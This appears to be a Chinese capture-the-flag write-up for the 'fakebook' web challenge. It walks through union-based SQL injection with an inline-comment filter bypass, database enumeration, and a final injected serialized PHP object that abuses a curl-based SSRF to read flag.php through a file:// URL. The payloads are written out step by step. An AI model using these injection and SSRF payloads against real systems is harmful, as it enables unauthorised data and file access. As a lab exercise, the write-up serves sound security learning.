打开题目,先看看有什么功能,发现查看用户时,网址为
view.php?no=1
尝试
view.php?no=0
得到报错界面。
尝试用"order by"测试,发现存在SQL注入,且得出字段数为4
开始尝试查询
view.php?no=0%20union%20select%201,2,3,4
回显
no hack _
用内联注释绕过
view.php?no=1%20/*!%20union*/%20select%201,2,3,4%20limit%201,1
然而出现了奇怪的报错
回显第二个字段
看这报错,难道是把用户数据处理成对象再序列化后存在数据库里?
暂且不管,先继续查询
view.php?no=0/*!%20union*/%20select%201,database(),3,4#
fakebook
view.php?no=0/*!%20union*/%20select%201,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'#
users
view.php?no=0/*!%20union*/%20select%201,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook'#
no,username,passwd,data
显然no、username、passwd都是知道的,但data是什么?
序列化字符串?
view.php?no=0/*!%20union*/%20select%201,group_concat(data),3,4 from users#
O:8:“UserInfo”:3:{s:4:“name”;s:5:“admin”;s:3:“age”;i:100;s:4:“blog”;s:5:“a.com”;},O:8:“UserInfo”:3:{s:4:“name”;s:6:“adminb”;s:3:“age”;i:100;s:4:“blog”;s:9:“baidu.com”;},O:8:“UserInfo”:3:{s:4:“name”;s:6:“adminc”;s:3:“age”;i:92;s:4:“blog”;s:21:“https://www.baidu.com”;}
还真是,那我的flag哪去了???
病急乱投医,拿出字典扫扫看
robots.txt和flag.php
flag.php打开是一片空白,但flag应该就在这个文件里了,那SQL注入注了个寂寞
robots.txt有用处
User-agent: *
Disallow: /user.php.bak
<?php
class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}
从blog中以流的形式读点东西回显,也就是ssrf ?
注册的时候把blog设置成file:///var/www/html/flag.php或许有效
然而被isValidBlog ()检测到了
这又想到之前SQL注入的奇怪报错了,看来不是白注了
猜测源码的逻辑,应该是要将data数据反序列化后访问blog,序列化前检测了blog的值,反序列化后总不会再检测一遍吧
view.php?no=0/*!%20union*/%20select%201,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:100;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#
大功告成